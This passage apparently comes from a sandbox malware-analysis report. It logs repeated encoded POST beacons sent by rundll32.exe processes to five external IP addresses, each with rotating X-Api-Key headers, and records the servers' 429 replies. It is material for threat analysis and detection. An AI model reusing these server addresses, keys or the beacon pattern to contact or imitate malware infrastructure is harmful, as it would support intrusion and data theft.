Jul 16, 2024 09:56:04.337369919 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Tue, 16 Jul 2024 07:56:04 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.7	49758	195.2.70.38	80	6500	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:56:09.201879978 CEST	293	OUT	POST / HTTP/1.1 Host: 195.2.70.38 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: 5iLPcNqO Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.7	49759	91.142.74.28	80	6500	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:56:10.932707071 CEST	294	OUT	POST / HTTP/1.1 Host: 91.142.74.28 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: 6kkdRC4a Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.7	49760	77.238.224.56	80	6500	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:56:12.686553001 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.224.56 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: y4UIYgff Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.7	49761	77.238.229.63	80	6500	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:56:14.350342035 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.229.63 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: HWrep38u Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.7	49762	77.238.250.123	80	6500	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:56:15.979751110 CEST	296	OUT	POST / HTTP/1.1 Host: 77.238.250.123 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: VJHig8V5 Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Jul 16, 2024 09:56:16.578107119 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Tue, 16 Jul 2024 07:56:16 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.7	49763	195.2.70.38	80	3576	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:56:34.341670036 CEST	293	OUT	POST / HTTP/1.1 Host: 195.2.70.38 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: HWkXkrlA Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.7	49764	91.142.74.28	80	3576	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:56:36.090318918 CEST	294	OUT	POST / HTTP/1.1 Host: 91.142.74.28 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: gEZ1bW1g Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.7	49765	77.238.224.56	80	3576	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:56:37.823539019 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.224.56 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: 9arMIqH6 Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.7	49766	77.238.229.63	80	3576	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:56:39.455946922 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.229.63 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: 12YPxDGi Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.7	49767	77.238.250.123	80	3576	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:56:41.101109028 CEST	296	OUT	POST / HTTP/1.1 Host: 77.238.250.123 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: 392ohfva Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Jul 16, 2024 09:56:41.699449062 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Tue, 16 Jul 2024 07:56:41 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.7	49768	195.2.70.38	80	6500	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:56:46.583673000 CEST	293	OUT	POST / HTTP/1.1 Host: 195.2.70.38 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: 1rUH0HmE Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.7	49769	91.142.74.28	80	6500	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:56:48.326128006 CEST	294	OUT	POST / HTTP/1.1 Host: 91.142.74.28 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: pOknuAzN Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.7	49770	77.238.224.56	80	6500	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:56:50.066318989 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.224.56 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: tVhqWrgR Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.7	49771	77.238.229.63	80	6500	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:56:51.689548016 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.229.63 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: h85hF5Cv Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.7	49772	77.238.250.123	80	6500	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:56:53.317260981 CEST	296	OUT	POST / HTTP/1.1 Host: 77.238.250.123 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: 3Kejmv2X Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Jul 16, 2024 09:56:53.923177004 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Tue, 16 Jul 2024 07:56:53 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.7	49773	195.2.70.38	80	3576	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:57:11.849152088 CEST	293	OUT	POST / HTTP/1.1 Host: 195.2.70.38 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: nguOPo7W Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.7	49774	91.142.74.28	80	3576	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:57:14.049349070 CEST	294	OUT	POST / HTTP/1.1 Host: 91.142.74.28 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: 07511hZu Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.7	49775	77.238.224.56	80	3576	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:57:15.796458960 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.224.56 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: ei4iTpwp Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.7	49776	77.238.229.63	80	3576	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:57:17.433605909 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.229.63 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: gSI9sCut Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.7	49777	77.238.250.123	80	3576	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:57:19.067260027 CEST	296	OUT	POST / HTTP/1.1 Host: 77.238.250.123 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: BLJxlL80 Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Jul 16, 2024 09:57:19.661217928 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Tue, 16 Jul 2024 07:57:19 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.7	49778	195.2.70.38	80	6500	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
